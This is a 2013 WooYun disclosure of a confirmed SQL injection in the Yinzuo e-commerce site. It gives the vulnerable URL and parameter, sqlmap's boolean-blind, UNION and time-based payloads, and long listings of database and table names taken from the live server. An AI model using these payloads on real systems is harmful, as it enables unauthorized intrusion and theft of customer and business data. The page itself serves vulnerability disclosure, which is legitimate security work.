当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021333

漏洞标题:银座网SQL存注入漏洞,数据库内敏感信息泄露

相关厂商:yinzuo100.com

漏洞作者: lucky

提交时间:2013-04-07 10:48

修复时间:2013-05-22 10:49

公开时间:2013-05-22 10:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-07: 细节已通知厂商并且等待厂商处理中
2013-04-08: 厂商已经确认,细节仅向厂商公开
2013-04-18: 细节向核心白帽子及相关领域专家公开
2013-04-28: 细节向普通白帽子公开
2013-05-08: 细节向实习白帽子公开
2013-05-22: 细节向公众公开

简要描述:

银座网SQL注入漏洞

详细说明:

http://www.yinzuo100.com//bbdaiyan_info.php?bb_id=34


Place: GET
Parameter: bb_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: bb_id=34 AND 5251=5251
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: bb_id=34 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x3a6366723a,0x5674596746476d564f4e,0x3a6b79713a), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: bb_id=34 AND SLEEP(5)
---
[21:06:06] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[21:06:06] [INFO] fetching database names
available databases [8]:
[*] information_schema
[*] inzone_zuitu_db
[*] mysql
[*] performance_schema
[*] system
[*] systemws
[*] xhm365_club
[*] xhm365_home


system表

| ly_memberdatas                |
| mobile_deposit                |
| mobile_num                    |
| monthly_plan                  |
| news                          |
| night_buy                     |
| notice                        |
| notice_goods_num_setting      |
| notice_sort                   |
| notice_temp                   |
| notice_user                   |
| oos_change                    |
| oos_change_goods              |
| order_goods_view_for_sdzy     |
| order_tmp                     |
| order_view_for_sdzy           |
| pd                            |
| pd_goods                      |
| pdate_editor                  |
| pdate_editor_goods            |
| points_act                    |
| points_buy                    |
| post_logs                     |
| post_logs_his                 |
| posunchuli                    |
| privilege                     |
| promotions_goods              |
| promotions_subject            |
| promotions_type               |
| psbc_account_log              |
| pspc_admin                    |
| pspc_eventlog                 |
| qhdj                          |
| qhdj_hz                       |
| qz_admin                      |
| qz_agoods                     |
| qz_akeyword                   |
| qz_article                    |
| qz_articlepic                 |
| qz_category                   |
| qz_comment                    |
| qz_czcategory                 |
| qz_goods                      |
| qz_index                      |
| qz_keyword                    |
| qz_label                      |
| qz_log                        |
| qz_motion                     |
| qz_pic                        |
| qz_picpromotion               |
| qz_searchkey                  |
| qz_textpromotion              |
| qz_yqcategory                 |
| recharge                      |
| recharge_action               |
| region                        |
| reimbursement                 |
| report_gaikuang               |
| report_yhz                    |
| return_reason                 |
| sample_photo                  |
| sample_photo_goods            |
| sanjizhang_jinhuo             |
| sanjizhang_tuihuo             |
| satisfaction                  |
| sc_come_list                  |
| sc_goods_users                |
| sc_goods_users_hb             |
| sc_ls_action                  |
| sc_tel_his                    |
| sdzy_ad                       |
| sdzy_ad_custom                |
| sdzy_ad_position              |
| sdzy_admin_action             |
| sdzy_admin_log                |
| sdzy_admin_message            |
| sdzy_admin_user               |
| sdzy_adsense                  |
| sdzy_affiliate_log            |
| sdzy_agency                   |
| sdzy_area_region              |
| sdzy_article                  |
| sdzy_article_cat              |
| sdzy_attribute                |
| sdzy_auction_log              |
| sdzy_auto_manage              |
| sdzy_back_goods               |
| sdzy_back_order               |
| sdzy_bonus_type               |
| sdzy_booking_goods            |
| sdzy_brand                    |
| sdzy_card                     |
| sdzy_cart                     |
| sdzy_cat_recommend            |
| sdzy_category                 |
| sdzy_cgd_price                |
| sdzy_collect_goods            |
| sdzy_comment                  |
| sdzy_crons                    |
| sdzy_delivery_goods           |
| sdzy_delivery_order           |
| sdzy_email_list               |
| sdzy_email_sendlist           |
| sdzy_error_log                |
| sdzy_exchange_goods           |
| sdzy_favourable_activity      |
| sdzy_feedback                 |
| sdzy_friend_link              |
| sdzy_goods                    |
| sdzy_goods2                   |
| sdzy_goods_0429               |
| sdzy_goods_0502               |
| sdzy_goods_activity           |
| sdzy_goods_article            |
| sdzy_goods_attr               |
| sdzy_goods_cat                |
| sdzy_goods_gallery            |
| sdzy_goods_gallery_copy       |
| sdzy_goods_type               |
| sdzy_group_goods              |
| sdzy_keywords                 |
| sdzy_link_goods               |
| sdzy_mail_templates           |
| sdzy_member_price             |
| sdzy_nav                      |
| sdzy_order_action             |
| sdzy_order_goods              |
| sdzy_order_info               |
| sdzy_pack                     |
| sdzy_package_goods            |
| sdzy_pay_log                  |
| sdzy_payment                  |
| sdzy_plugins                  |
| sdzy_products                 |
| sdzy_reg_extend_info          |
| sdzy_reg_fields               |
| sdzy_role                     |
| sdzy_searchengine             |
| sdzy_sessions                 |
| sdzy_sessions_data            |
| sdzy_shipping                 |
| sdzy_shipping_area            |
| sdzy_shop_config              |
| sdzy_snatch_log               |
| sdzy_stats                    |
| sdzy_suppliers                |
| sdzy_tag                      |
| sdzy_template                 |
| sdzy_topic                    |
| sdzy_user_address             |
| sdzy_user_bonus               |
| sdzy_user_feed                |
| sdzy_user_rank                |
| sdzy_users                    |
| sdzy_virtual_card             |
| sdzy_volume_price             |
| sdzy_vote                     |
| sdzy_vote_log                 |
| sdzy_vote_option              |
| sdzy_wholesale                |
| shannnnn                      |
| shlog                         |
| sms_log                       |
| sms_send_data                 |
| source_tables                 |
| special_order_set             |
| sync_gnum                     |
| sync_gnum_mode                |
| sync_logistics                |
| sync_price                    |
| taobao_glyx                   |
| taobao_glyx_bak               |
| taobao_glyx_img               |
| taobao_outer                  |
| tb_cat                        |
| tb_freight_rule               |
| tb_goods                      |
| tb_items                      |
| tb_sync_error                 |
| tel_back_g                    |
| tel_back_p                    |
| tel_back_q                    |
| tel_back_u                    |
| tel_back_ua                   |
| temp_jin                      |
| temp_jinhuo                   |
| tmall_outer                   |
| tmp_goods_sn                  |
| tong_account                  |
| tong_delivereventlog          |
| tong_deliverman               |
| tong_delivermanlog            |
| tong_order                    |
| tong_order_goods              |
| tong_order_how_pay            |
| toupiao_babycare              |
| toupiao_rellet                |
| toupiao_ymm                   |
| two_page_category             |
| two_page_category_ad          |
| two_page_category_pp          |
| uc_admins                     |
| uc_applications               |
| uc_badwords                   |
| uc_domains                    |
| uc_failedlogins               |
| uc_feeds                      |
| uc_friends                    |
| uc_mailqueue                  |
| uc_memberfields               |
| uc_members                    |
| uc_mergemembers               |
| uc_newpm                      |
| uc_notelist                   |
| uc_pms                        |
| uc_protectedmembers           |
| uc_settings                   |
| uc_sqlcache                   |
| uc_tags                       |
| uc_vars                       |
| unicom_number                 |
| unicom_number_type            |
| unicom_number_type2           |
| unicom_setmeal                |
| unicom_this_month_charges     |
| unicom_user_info              |
| user_account                  |
| user_address                  |
| user_config                   |
| userdatainfo                  |
| users_view_for_sdzy           |
| version_rep                   |
| voucher                       |
| wap_best                      |
| wap_hot                       |
| wap_new                       |
| wap_xhm_muying_cuxiao         |
| wap_xsqg                      |
| warehouse                     |
| warehouse_area                |
| warehouse_location            |
| warehouselocation_1           |
| warehouselocation_goods1      |
| warehouselocation_goods_error |
| wh2_ignore                    |
| wh2_info                      |
| wh2_result                    |
| wh2_resultlist                |
| wh_ignore                     |
| wh_info                       |
| wh_result                     |
| wh_resultlist                 |
| whl_switch                    |
| whl_switch_goods              |
| words                         |
| wuliu                         |
| xhm_ad                        |
| xhm_admin_user                |
| xhm_baihuo_cuxiao             |
| xhm_baihuo_goods              |
| xhm_bbdy                      |
| xhm_brand                     |
| xhm_breakegg                  |
| xhm_category                  |
| xhm_category_link             |
| xhm_category_rm               |
| xhm_category_tags             |
| xhm_category_top              |
| xhm_dytp_info                 |
| xhm_forth_hotsale             |
| xhm_forum_link                |
| xhm_forum_pic                 |
| xhm_forum_tag                 |
| xhm_goods                     |
| xhm_goods_keyword             |
| xhm_index_ads                 |
| xhm_keyword                   |
| xhm_kuaibao                   |
| xhm_kuaibao_wap               |
| xhm_kuaibao_wap1              |
| xhm_kuaibao_wap2              |
| xhm_log                       |
| xhm_muying_cuxiao             |
| xhm_muying_link               |
| xhm_muying_top                |
| xhm_navigation                |
| xhm_qianggou                  |
| xhm_rootpage                  |
| xhm_sbdyz                     |
| xhm_suggestions               |
| xhm_tag_1                     |
| xhm_tag_2                     |
| xhm_tag_3                     |
| xhm_tag_4                     |
| xhm_tag_5                     |
| xhm_tag_6                     |
| xhm_third_jiangjia            |
| xhm_third_newgoods            |
| xhm_vote                      |
| xhm_xsqg                      |
| xhm_yczhuanti                 |
| xhm_yczhuanti_ad              |
| xhm_yczhuanti_class           |
| xhm_yczhuanti_goods           |
| xhm_zhuanti                   |
| xhm_zhuanti_ad                |
| xhm_zhuanti_class             |
| xhm_zhuanti_goods             |
| xhm_zhuanti_mami              |
| xhm_zhuanti_second            |
| xhm_zhuanti_tg                |
| yinzuo_card                   |
| yinzuo_card_account           |
| yinzuo_card_data              |
| yinzuo_card_log               |
| yinzuo_voucher                |
| yinzuo_voucher_data           |
| yinzuo_yf                     |
| yinzuok_kui_list              |
| yinzuok_kui_tag               |
| yinzuosms_sendsms             |
| youzheng                      |
| zhurouruku                    |
| zy_sellercode                 |
+-------------------------------+
[21:10:20] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.yinzuo100.com'
[*] shutting down at 21:10:20


[21:12:18] [INFO] fetching tables for database: 'systemws'
[21:12:19] [WARNING] reflective value(s) found and filtering out
Database: systemws
[433 tables]
+----------------------------+
| account_log                |
| act_vip                    |
| act_vip_goods              |
| active                     |
| active_test                |
| active_users               |
| activity                   |
| aibeilong                  |
| area                       |
| b_article                  |
| b_co                       |
| b_goods_info               |
| b_goods_sort               |
| b_shop                     |
| b_user                     |
| b_ywgz                     |
| b_ywgz_sort                |
| banner                     |
| banner_copy                |
| c_amortize                 |
| c_bank                     |
| c_budget                   |
| c_cash_account             |
| c_detial                   |
| c_month_settlement         |
| c_profits                  |
| c_salary                   |
| c_sales                    |
| c_subject                  |
| catalog                    |
| catalog_1010_list          |
| catalog_11                 |
| catalog_11_2               |
| catalog_11_3               |
| catalog_11_4               |
| catalog_11_5               |
| catalog_11_6               |
| catalog_11_7               |
| catalog_1458_328           |
| catalog_201103_1           |
| catalog_201104_2           |
| catalog_727_list           |
| catalog_729_3              |
| catalog_812_4              |
| catalog_blacklist          |
| catalog_first_muluce       |
| catalog_log                |
| catalog_users              |
| channel                    |
| channel_sort               |
| co_account                 |
| co_account_detail          |
| co_advance                 |
| co_invoice                 |
| co_payment                 |
| co_rebate                  |
| co_settlement              |
| co_summary                 |
| co_summary_start_amount    |
| column                     |
| complaint                  |
| config                     |
| cpslog                     |
| crm_admin                  |
| crm_admin_auth             |
| crm_admin_auth_sort        |
| crm_admin_logs             |
| crm_admin_postion          |
| crm_cgd                    |
| crm_cgd_acc                |
| crm_cgd_fk                 |
| crm_cgd_g                  |
| crm_co                     |
| crm_co_principal           |
| crm_employees              |
| crm_entry                  |
| crm_entrygoods             |
| crm_exchange               |
| crm_exchange_goods         |
| crm_goods                  |
| crm_goods_bd               |
| crm_goods_brand            |
| crm_goods_parts            |
| crm_goods_sort             |
| crm_goods_sort_ext         |
| crm_order                  |
| crm_order_goods            |
| crm_order_how_pay          |
| crm_order_how_pay_lock     |
| crm_order_mem              |
| crm_repair                 |
| crm_repair_goods           |
| crm_return                 |
| crm_return_goods           |
| crm_return_how_pay         |
| crm_storage                |
| crm_storage_collection     |
| crm_storage_detail         |
| crm_storage_summary        |
| crm_storage_total          |
| crm_thd                    |
| crm_thd_g                  |
| department                 |
| ecs_account_log            |
| ecs_ad                     |
| ecs_ad_bakrcy              |
| ecs_ad_position            |
| ecs_ad_position_bakrcy     |
| ecs_admin_action           |
| ecs_admin_log              |
| ecs_admin_message          |
| ecs_admin_user             |
| ecs_adsense                |
| ecs_affiliate_log          |
| ecs_agency                 |
| ecs_area_region            |
| ecs_article                |
| ecs_article_cat            |
| ecs_article_cat_bakrcy     |
| ecs_attribute              |
| ecs_auction_log            |
| ecs_auto_manage            |
| ecs_bonus_type             |
| ecs_booking_goods          |
| ecs_brand                  |
| ecs_card                   |
| ecs_card_log               |
| ecs_cart                   |
| ecs_cart_order             |
| ecs_category               |
| ecs_collect_goods          |
| ecs_comment                |
| ecs_crons                  |
| ecs_email_list             |
| ecs_email_sendlist         |
| ecs_error_log              |
| ecs_favourable_activity    |
| ecs_feedback               |
| ecs_friend_link            |
| ecs_goods                  |
| ecs_goods_activity         |
| ecs_goods_article          |
| ecs_goods_attr             |
| ecs_goods_cat              |
| ecs_goods_gallery          |
| ecs_goods_type             |
| ecs_group_goods            |
| ecs_keywords               |
| ecs_link_goods             |
| ecs_mail_templates         |
| ecs_member_price           |
| ecs_nav                    |
| ecs_order_action           |
| ecs_order_goods            |
| ecs_order_info             |
| ecs_pack                   |
| ecs_pay_log                |
| ecs_payment                |
| ecs_plugins                |
| ecs_promotion_attribute    |
| ecs_region                 |
| ecs_searchengine           |
| ecs_sessions               |
| ecs_sessions_data          |
| ecs_shipping               |
| ecs_shipping_area          |
| ecs_shop_config            |
| ecs_snatch_log             |
| ecs_stats                  |
| ecs_suoqu                  |
| ecs_tag                    |
| ecs_template               |
| ecs_topic                  |
| ecs_user_account           |
| ecs_user_address           |
| ecs_user_bonus             |
| ecs_user_feed              |
| ecs_user_rank              |
| ecs_users                  |
| ecs_virtual_card           |
| ecs_vote                   |
| ecs_vote_log               |
| ecs_vote_option            |
| ecs_wholesale              |
| ecs_yinzuozq               |
| ecs_yjhx                   |
| email                      |
| emsHd                      |
| error_logs                 |
| fandian_entry              |
| faq_back                   |
| faq_cate                   |
| faq_qa                     |
| fukuan                     |
| fukuan_sort                |
| gg_info                    |
| goods_action               |
| goods_action_summary       |
| goods_action_summary_month |
| goods_attr                 |
| goods_ds                   |
| goods_group                |
| goods_group_info           |
| goods_sell_num             |
| goods_type                 |
| goods_type_attr            |
| groupbuy                   |
| groupbuy_copy              |
| guibinquancheck            |
| hao                        |
| helpinfo                   |
| hezuo_user                 |
| hyxx                       |
| hzp_tag_1                  |
| hzp_tag_2                  |
| hzp_tag_3                  |
| hzp_tag_4                  |
| hzp_tag_5                  |
| hzp_tag_6                  |
| invoice                    |
| invoice_order              |
| ip                         |
| jiaju_tag_1                |
| jiaju_tag_2                |
| jiaju_tag_3                |
| jiaju_tag_4                |
| jiaju_tag_5                |
| jiaju_tag_6                |
| kf_group_data              |
| kw                         |
| loan_application           |
| loan_application_goods     |
| loan_return                |
| loan_return_goods          |
| ly_memberdatas             |
| mobile_deposit             |
| mobile_num                 |
| news                       |
| night_buy                  |
| notice                     |
| notice_sort                |
| notice_temp                |
| notice_user                |
| oos_change                 |
| oos_change_goods           |
| order_goods_view_for_sdzy  |
| order_tmp                  |
| order_view_for_sdzy        |
| pd                         |
| pd_goods                   |
| pdate_editor               |
| pdate_editor_goods         |
| points_act                 |
| points_buy                 |
| points_buy_copy            |
| post_logs                  |
| post_logs_his              |
| posunchuli                 |
| privilege                  |
| promotions_goods           |
| promotions_subject         |
| promotions_type            |
| psbc_account_log           |
| pspc_admin                 |
| pspc_eventlog              |
| qhdj                       |
| qhdj_hz                    |
| qz_admin                   |
| qz_agoods                  |
| qz_akeyword                |
| qz_article                 |
| qz_articlepic              |
| qz_category                |
| qz_comment                 |
| qz_czcategory              |
| qz_goods                   |
| qz_index                   |
| qz_keyword                 |
| qz_label                   |
| qz_log                     |
| qz_motion                  |
| qz_pic                     |
| qz_picpromotion            |
| qz_searchkey               |
| qz_textpromotion           |
| qz_yqcategory              |
| recharge                   |
| recharge_action            |
| region                     |
| reimbursement              |
| report_yhz                 |
| return_reason              |
| sanjizhang_jinhuo          |
| sanjizhang_tuihuo          |
| satisfaction               |
| sc_come_list               |
| sc_goods_users             |
| sc_goods_users_hb          |
| sc_ls_action               |
| sc_tel_his                 |
| shannnnn                   |
| shlog                      |
| sms_log                    |
| sms_send_data              |
| source_tables              |
| taobao_gnum                |
| taobao_members             |
| taobao_outer               |
| tb_cat                     |
| tb_freight_rule            |
| tb_goods                   |
| tb_items                   |
| tel_back_g                 |
| tel_back_p                 |
| tel_back_q                 |
| tel_back_u                 |
| tel_back_ua                |
| temp_jin                   |
| temp_jinhuo                |
| temp_jinhuo_copy           |
| tmp_del_hei                |
| tmp_goods                  |
| tmp_repass                 |
| top_navigation             |
| top_navigation_cat         |
| toupiao_babycare           |
| toupiao_rellet             |
| toupiao_ymm                |
| uc_admins                  |
| uc_applications            |
| uc_badwords                |
| uc_domains                 |
| uc_failedlogins            |
| uc_feeds                   |
| uc_friends                 |
| uc_mailqueue               |
| uc_memberfields            |
| uc_members                 |
| uc_mergemembers            |
| uc_newpm                   |
| uc_notelist                |
| uc_pms                     |
| uc_protectedmembers        |
| uc_settings                |
| uc_sqlcache                |
| uc_tags                    |
| uc_vars                    |
| unicom_number              |
| unicom_number_type         |
| unicom_number_type2        |
| unicom_setmeal             |
| unicom_this_month_charges  |
| unicom_user_info           |
| user_account               |
| user_address               |
| user_config                |
| userdatainfo               |
| users_view_for_sdzy        |
| version_rep                |
| voucher                    |
| wap_best                   |
| wap_hot                    |
| wap_new                    |
| wap_xhm_muying_cuxiao      |
| wap_xsqg                   |
| warehouse                  |
| warehouselocation          |
| wh2_ignore                 |
| wh2_info                   |
| wh2_result                 |
| wh2_resultlist             |
| wh_ignore                  |
| wh_info                    |
| wh_result                  |
| wh_resultlist              |
| whl_switch                 |
| whl_switch_goods           |
| words                      |
| words_copy                 |
| wuliu                      |
| xhm_ad                     |
| xhm_admin_user             |
| xhm_baihuo_cuxiao          |
| xhm_baihuo_goods           |
| xhm_bbdy                   |
| xhm_brand                  |
| xhm_category               |
| xhm_category_link          |
| xhm_category_tags          |
| xhm_category_top           |
| xhm_dytp_info              |
| xhm_forth_hotsale          |
| xhm_forum_link             |
| xhm_forum_pic              |
| xhm_forum_tag              |
| xhm_goods                  |
| xhm_goods_keyword          |
| xhm_keyword                |
| xhm_kuaibao                |
| xhm_kuaibao_wap            |
| xhm_kuaibao_wap1           |
| xhm_log                    |
| xhm_muying_cuxiao          |
| xhm_muying_link            |
| xhm_muying_top             |
| xhm_navigation             |
| xhm_qianggou               |
| xhm_rootpage               |
| xhm_suggestions            |
| xhm_tag_1                  |
| xhm_tag_2                  |
| xhm_tag_3                  |
| xhm_tag_4                  |
| xhm_tag_5                  |
| xhm_tag_6                  |
| xhm_third_jiangjia         |
| xhm_third_newgoods         |
| xhm_vote                   |
| xhm_xsqg                   |
| xhm_zhuanti                |
| xhm_zhuanti_ad             |
| xhm_zhuanti_class          |
| xhm_zhuanti_goods          |
| yinzuo_card                |
| yinzuo_card_account        |
| yinzuo_card_data           |
| yinzuo_card_log            |
| yinzuo_voucher             |
| yinzuo_voucher_data        |
| yinzuok_kui_list           |
| yinzuok_kui_tag            |
| youzheng                   |
| zy_sellercode              |
+----------------------------+


。。。。。。

漏洞证明:

修复方案:

版权声明:转载请注明来源 lucky@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-04-08 09:25

厂商回复:

谢谢,我们会尽快处理。

最新状态:

暂无